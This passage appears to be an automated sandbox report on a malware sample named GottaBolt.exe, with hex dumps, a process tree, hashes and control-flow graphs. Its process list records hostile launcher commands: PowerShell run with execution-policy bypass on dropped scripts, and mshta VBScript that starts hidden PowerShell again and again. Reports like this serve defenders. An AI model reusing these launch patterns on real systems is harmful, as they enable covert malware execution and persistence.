                                                                2024-11-22 16:12:04 UTC16384INData Raw: 7c 92 dc df 10 f4 ab 8a 6f 5e 8b f9 f1 e3 01 73 7c fc 04 0c eb cb 43 19 79 84 fe 6e 41 53 e2 2a e3 dc 9d 39 2f 75 90 d3 49 01 3c d9 5b 45 d8 c0 54 9e 24 74 62 32 f6 05 f7 0d 07 62 d8 cf 98 fd 02 26 ef 95 3a 4e 71 5d 1b e6 dd 77 19 3f db 1f f5 df e6 64 e8 85 91 e1 f1 11 93 79 03 91 0e e8 8f e3 9f d1 78 ce cc 64 dd d3 3f 0c fd 3c 9c 2d 23 c7 73 d7 77 86 e0 e7 4b 29 29 93 e4 de b1 f1 f8 3c ef c7 97 c3 55 0c cb fb c2 07 df 63 bc 7a be 90 68 01 5f 45 c8 d6 f1 66 c4 16 46 ad 2b 65 52 45 15 2b 83 73 49 7d fb 1d 8d 5e 57 b6 57 87 f2 e0 be 12 ae ce 73 05 9c fc 8b 57 2f 0d d8 ed de 46 b8 df 1f 56 8d da 8f 87 bd 2d 3f 36 1c 14 b0 44 2b 77 e7 36 51 59 bf 9f ec 8b 3a 9c 6b ed 66 d0 8a 0f 84 6a 87 11 30 46 0b 23 1f 05 2e ef e9 62 a0 f2 23 0e 2f 18 88 de 43 79 6a 4b 6e
                                                                Data Ascii: |o^s|CynAS*9/uI<[ET$tb2b&:Nq]w?dyxd?<-#swK))<Uczh_EfF+eRE+sI}^WWsW/FV-?6D+w6QY:kfj0F#.b#/CyjKn
                                                                2024-11-22 16:12:04 UTC16384INData Raw: 5b 47 8a 95 0e 0d 6c 5e 37 80 eb 06 b3 f8 be f5 cb ff fe 93 bd 67 c4 56 6a ea 85 19 62 94 ce e6 8b ff 71 42 77 19 2f 15 8a 71 ba f9 89 3f 7f a5 b0 3c fb 07 9f 0b 3f 59 ed 70 8f c1 09 d1 04 fb 54 93 e5 9d c1 a3 c4 65 2c 39 d6 c9 c1 a5 0f d0 4f ca c7 64 ff 06 4e e7 94 71 f3 a3 11 ce df af 93 7c e3 24 97 34 e2 99 91 92 8a 46 fa 10 46 b8 9c e3 4f a2 2a f7 16 68 50 7c 2a 94 e5 06 bb 11 73 51 a7 ff be b7 28 e7 6e 44 44 f2 07 9e 9f b3 89 da 3a 84 a4 ba 38 4c aa e6 20 b2 71 09 d7 2d 06 b2 78 fe 7e a2 95 ce 33 6f 4b 23 4f e6 2e 47 a9 6b 05 63 5a 86 32 2d ba 85 23 32 a5 fc f1 56 65 a0 40 18 74 5f 8b f2 6b d1 71 c4 fa ca 39 71 2a 93 1f 0d 57 89 3a 95 81 53 46 21 45 d3 aa 79 a1 7a 98 29 1d 57 39 d7 7c 19 0b d5 4b 2c 91 7f 82 92 bd 34 d5 71 fa 94 f9 4b f1 2e cf 82 9f
                                                                Data Ascii: [Gl^7gVjbqBw/q?<?YpTe,9OdNq|$4FFO*hP|*sQ(nDD:8L q-x~3oK#O.GkcZ2-#2Ve@t_kq9q*W:SF!Eyz)W9|K,4qK.


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:11:11:35
                                                                Start date:22/11/2024
                                                                Path:C:\Users\user\Desktop\GottaBolt.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\GottaBolt.exe"
                                                                Imagebase:0x252f8540000
                                                                File size:25'560 bytes
                                                                MD5 hash:981C56E26AE89A9190D1F1DB9D2683CE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:11:11:48
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:11:11:48
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:11:11:58
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\mshta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
                                                                Imagebase:0x7ff7a7fc0000
                                                                File size:14'848 bytes
                                                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:11:11:59
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:11:11:59
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:11
                                                                Start time:11:12:59
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\mshta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
                                                                Imagebase:0x7ff7a7fc0000
                                                                File size:14'848 bytes
                                                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:11:12:59
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:11:12:59
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:11:13:58
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\mshta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
                                                                Imagebase:0x7ff7a7fc0000
                                                                File size:14'848 bytes
                                                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:11:13:58
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:11:13:58
                                                                Start date:22/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.8%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 6383 7ff848f1eb90 6384 7ff848f1eb95 LoadLibraryExW 6383->6384 6386 7ff848f1ed1d 6384->6386

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 83 7ff848f1e7db-7ff848f217ca 85 7ff848f217d1-7ff848f21812 83->85 86 7ff848f21818-7ff848f21823 85->86 87 7ff848f2182b-7ff848f21853 86->87 88 7ff848f21825 86->88 89 7ff848f2185e-7ff848f21894 87->89 90 7ff848f21855-7ff848f2185d 87->90 88->87 93 7ff848f218ed-7ff848f21905 89->93 94 7ff848f21896-7ff848f218bb 89->94 90->89 97 7ff848f2194f-7ff848f21968 93->97 98 7ff848f21907-7ff848f2192a 93->98 102 7ff848f218bd-7ff848f218d0 94->102 103 7ff848f2193c-7ff848f2194c 94->103 100 7ff848f21970-7ff848f21981 97->100 101 7ff848f2196b call 7ff848f20ff0 97->101 104 7ff848f21936-7ff848f2196b call 7ff848f20ff0 98->104 105 7ff848f2199d-7ff848f219a1 100->105 106 7ff848f21983-7ff848f2199b 100->106 101->100 103->97 104->100 107 7ff848f219a6-7ff848f219d9 105->107 106->107 112 7ff848f21eca-7ff848f21ed3 call 7ff848f2200b 107->112 113 7ff848f219df-7ff848f219f3 107->113 121 7ff848f21edf-7ff848f21ef2 112->121 115 7ff848f21a13-7ff848f21a2a 113->115 116 7ff848f219f5-7ff848f219fe 113->116 119 7ff848f21eba 115->119 120 7ff848f21a30-7ff848f21a36 115->120 118 7ff848f21a01-7ff848f21a08 116->118 118->118 122 7ff848f21a0a-7ff848f21a0f 118->122 125 7ff848f21ebf-7ff848f21ede call 7ff848f21fc3 call 7ff848f2200b 119->125 123 7ff848f21a38-7ff848f21a41 120->123 124 7ff848f21a56-7ff848f21a6d 120->124 137 7ff848f21f53-7ff848f21f60 121->137 138 7ff848f21ef4-7ff848f21f1b 121->138 122->115 127 7ff848f21a44-7ff848f21a4b 123->127 124->119 126 7ff848f21a73-7ff848f21a79 124->126 125->121 129 7ff848f21a99-7ff848f21ab5 126->129 130 7ff848f21a7b-7ff848f21a84 126->130 127->127 132 7ff848f21a4d-7ff848f21a52 127->132 135 7ff848f21abd-7ff848f21ac6 129->135 136 7ff848f21ab7-7ff848f21abb 129->136 134 7ff848f21a87-7ff848f21a8e 130->134 132->124 134->134 140 7ff848f21a90-7ff848f21a95 134->140 142 7ff848f21ad9-7ff848f21ae1 135->142 136->135 141 7ff848f21ac8-7ff848f21acc 136->141 144 7ff848f21f65-7ff848f21f75 137->144 143 7ff848f21f1d-7ff848f21f50 138->143 138->144 140->129 149 7ff848f21ace-7ff848f21ad3 141->149 150 7ff848f21af4 141->150 147 7ff848f21ae9-7ff848f21af2 142->147 148 7ff848f21ae3-7ff848f21ae7 142->148 143->137 154 7ff848f21b0a-7ff848f21b11 147->154 148->147 153 7ff848f21af9-7ff848f21afd 148->153 149->142 150->153 153->150 155 7ff848f21aff-7ff848f21b04 153->155 156 7ff848f21b19-7ff848f21b22 154->156 157 7ff848f21b13-7ff848f21b17 154->157 155->154 159 7ff848f21b35-7ff848f21bd7 156->159 157->156 158 7ff848f21b24-7ff848f21b28 157->158 158->150 160 7ff848f21b2a-7ff848f21b2f 158->160 164 7ff848f21bd9-7ff848f21bdc 159->164 165 7ff848f21c53-7ff848f21c56 159->165 160->159 166 7ff848f21c58-7ff848f21c75 164->166 167 7ff848f21bde-7ff848f21be0 164->167 165->166 169 7ff848f21c7d-7ff848f21c7f 166->169 170 7ff848f21c2b-7ff848f21c42 167->170 171 7ff848f21be2-7ff848f21be7 167->171 172 7ff848f21c81-7ff848f21c87 169->172 173 7ff848f21cf0-7ff848f21cf6 169->173 170->169 176 7ff848f21d2d 171->176 177 7ff848f21bed-7ff848f21bf1 171->177 178 7ff848f21c89 172->178 179 7ff848f21d03-7ff848f21d08 172->179 174 7ff848f21d72-7ff848f21d76 173->174 175 7ff848f21cf7 173->175 187 7ff848f21d77-7ff848f21d88 174->187 181 7ff848f21d68-7ff848f21d6d 175->181 182 7ff848f21cf8-7ff848f21cfb 175->182 180 7ff848f21d31-7ff848f21d3c 176->180 177->176 183 7ff848f21bf7-7ff848f21bfa 177->183 188 7ff848f21c8b-7ff848f21c9f 178->188 189 7ff848f21cd0-7ff848f21cda 178->189 184 7ff848f21d89-7ff848f21d8e 179->184 185 7ff848f21d0a-7ff848f21d0d 179->185 213 7ff848f21d3d-7ff848f21d43 180->213 181->174 182->187 192 7ff848f21cfd 182->192 193 7ff848f21bfc-7ff848f21c28 183->193 194 7ff848f21c44-7ff848f21c47 183->194 206 7ff848f21d8f-7ff848f21d9b 184->206 212 7ff848f21d9e-7ff848f21e1b 184->212 185->184 195 7ff848f21d0f 185->195 187->184 190 7ff848f21ca1 188->190 191 7ff848f21d10-7ff848f21d13 188->191 196 7ff848f21d4b-7ff848f21d58 189->196 197 7ff848f21cdc-7ff848f21cdd 189->197 199 7ff848f21ca3 190->199 191->206 207 7ff848f21d15 191->207 203 7ff848f21cff-7ff848f21d01 192->203 204 7ff848f21d44-7ff848f21d48 192->204 193->170 194->169 201 7ff848f21c49-7ff848f21c51 194->201 195->191 205 7ff848f21d5b 196->205 198 7ff848f21cdf 197->198 197->199 198->205 209 7ff848f21ce1 198->209 210 7ff848f21d1f-7ff848f21d21 199->210 211 7ff848f21ca5 199->211 201->165 203->179 204->196 214 7ff848f21d5c-7ff848f21d64 205->214 206->212 207->214 215 7ff848f21d17-7ff848f21d1a 207->215 216 7ff848f21d28-7ff848f21d2a 209->216 217 7ff848f21ce3-7ff848f21ceb 209->217 210->216 218 7ff848f21cec-7ff848f21cef 211->218 219 7ff848f21ca7-7ff848f21caa 211->219 227 7ff848f21eae-7ff848f21eb8 call 7ff848f21f77 212->227 228 7ff848f21e21-7ff848f21e66 212->228 213->204 214->181 220 7ff848f21d1b-7ff848f21d1e 215->220 216->176 217->218 218->173 219->220 221 7ff848f21cac-7ff848f21cb5 219->221 220->210 221->180 223 7ff848f21cb7-7ff848f21cbc 221->223 223->213 224 7ff848f21cbe-7ff848f21cc9 223->224 227->125 235 7ff848f21e68-7ff848f21e75 228->235 236 7ff848f21e7f-7ff848f21ead 228->236 235->236 238 7ff848f21e77-7ff848f21e7d 235->238 236->227 238->236
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8cc7aac733fe98cb4d07bde12d1e9258e541cd6fd625d18eb6fca719efc14ddb
                                                                  • Instruction ID: f73165548ac3b816529eb9ba726abb089940e15c5a769efda17538b728f1696c
                                                                  • Opcode Fuzzy Hash: 8cc7aac733fe98cb4d07bde12d1e9258e541cd6fd625d18eb6fca719efc14ddb
                                                                  • Instruction Fuzzy Hash: EF52043090DA898FEB68EB6898557A877E0FF55350F0001BED44DC72D2DB39B986C789

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 241 7ff848f148d6-7ff848f148e3 242 7ff848f148ee-7ff848f149b7 241->242 243 7ff848f148e5-7ff848f148ed 241->243 248 7ff848f149b9-7ff848f149c2 242->248 249 7ff848f14a23 242->249 243->242 248->249 251 7ff848f149c4-7ff848f149d0 248->251 250 7ff848f14a25-7ff848f14a4a 249->250 258 7ff848f14a4c-7ff848f14a55 250->258 259 7ff848f14ab6 250->259 252 7ff848f14a09-7ff848f14a21 251->252 253 7ff848f149d2-7ff848f149e4 251->253 252->250 254 7ff848f149e8-7ff848f149fb 253->254 255 7ff848f149e6 253->255 254->254 257 7ff848f149fd-7ff848f14a05 254->257 255->254 257->252 258->259 261 7ff848f14a57-7ff848f14a63 258->261 260 7ff848f14ab8-7ff848f14b60 259->260 272 7ff848f14bce 260->272 273 7ff848f14b62-7ff848f14b6c 260->273 262 7ff848f14a9c-7ff848f14ab4 261->262 263 7ff848f14a65-7ff848f14a77 261->263 262->260 265 7ff848f14a79 263->265 266 7ff848f14a7b-7ff848f14a8e 263->266 265->266 266->266 268 7ff848f14a90-7ff848f14a98 266->268 268->262 274 7ff848f14bd0-7ff848f14bf9 272->274 273->272 275 7ff848f14b6e-7ff848f14b7b 273->275 281 7ff848f14bfb-7ff848f14c06 274->281 282 7ff848f14c63 274->282 276 7ff848f14b7d-7ff848f14b8f 275->276 277 7ff848f14bb4-7ff848f14bcc 275->277 279 7ff848f14b91 276->279 280 7ff848f14b93-7ff848f14ba6 276->280 277->274 279->280 280->280 283 7ff848f14ba8-7ff848f14bb0 280->283 281->282 284 7ff848f14c08-7ff848f14c16 281->284 285 7ff848f14c65-7ff848f14cf6 282->285 283->277 286 7ff848f14c18-7ff848f14c2a 284->286 287 7ff848f14c4f-7ff848f14c61 284->287 293 7ff848f14cfc-7ff848f14d0b 285->293 288 7ff848f14c2c 286->288 289 7ff848f14c2e-7ff848f14c41 286->289 287->285 288->289 289->289 291 7ff848f14c43-7ff848f14c4b 289->291 291->287 294 7ff848f14d0d 293->294 295 7ff848f14d13-7ff848f14d78 call 7ff848f14d94 293->295 294->295 303 7ff848f14d7a 295->303 304 7ff848f14d7f-7ff848f14d92 295->304 303->304
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bc577522606148e5f575e3a1000f1f0b8138cd7da3d3ef576170b9e04505b0c
                                                                  • Instruction ID: 9a4afc3bedd7b5074276ceca9bd001b85a7dcccee335e24380b7eb358bd457a2
                                                                  • Opcode Fuzzy Hash: 9bc577522606148e5f575e3a1000f1f0b8138cd7da3d3ef576170b9e04505b0c
                                                                  • Instruction Fuzzy Hash: 59F1923091CA4E8FEBA8EF28C8557E937D1FFA4351F04426AE84DC7295CF3499418B86

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 305 7ff848f15682-7ff848f1568f 306 7ff848f1569a-7ff848f15767 305->306 307 7ff848f15691-7ff848f15699 305->307 312 7ff848f15769-7ff848f15772 306->312 313 7ff848f157d3 306->313 307->306 312->313 314 7ff848f15774-7ff848f15780 312->314 315 7ff848f157d5-7ff848f157fa 313->315 316 7ff848f157b9-7ff848f157d1 314->316 317 7ff848f15782-7ff848f15794 314->317 322 7ff848f157fc-7ff848f15805 315->322 323 7ff848f15866 315->323 316->315 318 7ff848f15798-7ff848f157ab 317->318 319 7ff848f15796 317->319 318->318 321 7ff848f157ad-7ff848f157b5 318->321 319->318 321->316 322->323 325 7ff848f15807-7ff848f15813 322->325 324 7ff848f15868-7ff848f1588d 323->324 331 7ff848f158fb 324->331 332 7ff848f1588f-7ff848f15899 324->332 326 7ff848f1584c-7ff848f15864 325->326 327 7ff848f15815-7ff848f15827 325->327 326->324 329 7ff848f15829 327->329 330 7ff848f1582b-7ff848f1583e 327->330 329->330 330->330 333 7ff848f15840-7ff848f15848 330->333 335 7ff848f158fd-7ff848f1592b 331->335 332->331 334 7ff848f1589b-7ff848f158a8 332->334 333->326 336 7ff848f158aa-7ff848f158bc 334->336 337 7ff848f158e1-7ff848f158f9 334->337 341 7ff848f1599b 335->341 342 7ff848f1592d-7ff848f15938 335->342 338 7ff848f158be 336->338 339 7ff848f158c0-7ff848f158d3 336->339 337->335 338->339 339->339 343 7ff848f158d5-7ff848f158dd 339->343 345 7ff848f1599d-7ff848f15a75 341->345 342->341 344 7ff848f1593a-7ff848f15948 342->344 343->337 346 7ff848f1594a-7ff848f1595c 344->346 347 7ff848f15981-7ff848f15999 344->347 355 7ff848f15a7b-7ff848f15a8a 345->355 348 7ff848f1595e 346->348 349 7ff848f15960-7ff848f15973 346->349 347->345 348->349 349->349 351 7ff848f15975-7ff848f1597d 349->351 351->347 356 7ff848f15a8c 355->356 357 7ff848f15a92-7ff848f15af4 call 7ff848f15b10 355->357 356->357 365 7ff848f15afb-7ff848f15b0e 357->365 366 7ff848f15af6 357->366 366->365
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ca3e37858f8bfad5776fc107528df82a68259fe93af60f0599e8831213f8a3f1
                                                                  • Instruction ID: b4e0e7de574452ccf531ce9a6ee1331e1950f2fe85cba2326215dd07d6950b62
                                                                  • Opcode Fuzzy Hash: ca3e37858f8bfad5776fc107528df82a68259fe93af60f0599e8831213f8a3f1
                                                                  • Instruction Fuzzy Hash: 4CE1A23090CA4E8FEBA8EF28C8557E977D1FF58350F14426AD84DC7291DF78A9448B82

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 7339310dd5be3085990625d1551d923679c231e349a9451f794853ab67241471
                                                                  • Instruction ID: 2d2a4dc7c2e44776ec278642bbf793add47b1d4510448b9c9b9521c251c954bd
                                                                  • Opcode Fuzzy Hash: 7339310dd5be3085990625d1551d923679c231e349a9451f794853ab67241471
                                                                  • Instruction Fuzzy Hash: DCA1F13190DA8C9FDB1ADB689849BE9BFF0EF56321F04426FD049C3192DB64A845CB91

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: ce050b7533112d5e779aaabb02d20d81c274e2f48fec69574d4305f949136886
                                                                  • Instruction ID: 4dce0423bf907fac536abcb55b4e899c6b2a64fda8b86596afcdd62d49730ba0
                                                                  • Opcode Fuzzy Hash: ce050b7533112d5e779aaabb02d20d81c274e2f48fec69574d4305f949136886
                                                                  • Instruction Fuzzy Hash: 3591FF3190CA4C9FDB19DB689849BEABBF0FF56321F04426FD049D3192CB74A845CB91

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: d94ce801f4c4b569f45cf99abea1a3796e4143e4acc7ddeb1dc58035c19a12ab
                                                                  • Instruction ID: a0875423f53c26cd5211328505e1f4769deb443f8d3c4db115893dcd9300ae5c
                                                                  • Opcode Fuzzy Hash: d94ce801f4c4b569f45cf99abea1a3796e4143e4acc7ddeb1dc58035c19a12ab
                                                                  • Instruction Fuzzy Hash: 4351FF3190DA8C9FDB59DB688849BE9BFF0FF5A320F04426FD049D3192CB64A845CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5{A$_
                                                                  • API String ID: 0-2574668834
                                                                  • Opcode ID: d7b4cdbfd4a2585812dc149da8efc2f2f1a4a4a721a967abaad5ca91e74a4c6d
                                                                  • Instruction ID: 36eb60e29f09f6d24c02294e73d67c1dab48e8d4e0e5cc633ca30c7b21c4089e
                                                                  • Opcode Fuzzy Hash: d7b4cdbfd4a2585812dc149da8efc2f2f1a4a4a721a967abaad5ca91e74a4c6d
                                                                  • Instruction Fuzzy Hash: 0CC1B52771E5629AD341BBBDB8451EDB760EFC13BAB044277D388CD093DA1D548A83E8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5{A$_
                                                                  • API String ID: 0-2574668834
                                                                  • Opcode ID: 12f3e538af5a9721d6773122fc3594743e964a116a4e7eee71f15c0296a19186
                                                                  • Instruction ID: 678289adcf8d0da10f301a809335ffa9e7ab34dada0920c5754d470dd744e940
                                                                  • Opcode Fuzzy Hash: 12f3e538af5a9721d6773122fc3594743e964a116a4e7eee71f15c0296a19186
                                                                  • Instruction Fuzzy Hash: 4EC1942771E5629AD341BBBDB8451EDB760EFC13BAB044277D388CD093DA0D548A87E8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5{A$BN_^
                                                                  • API String ID: 0-3401455036
                                                                  • Opcode ID: 1d234afeaaaf127b8248e3c2eba2312a6780d4434c6e7ed868e10b80d9f4920e
                                                                  • Instruction ID: ae6b210005d64369983412c8a0ade486006c54649319b86ef1a8dc5b8c1f5980
                                                                  • Opcode Fuzzy Hash: 1d234afeaaaf127b8248e3c2eba2312a6780d4434c6e7ed868e10b80d9f4920e
                                                                  • Instruction Fuzzy Hash: AC91A42771E5629AD201B7BDB8451EDA760EFC13BAF044277D38CCD0939A1D648B83E8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2646757041.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff848f10000_GottaBolt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: _
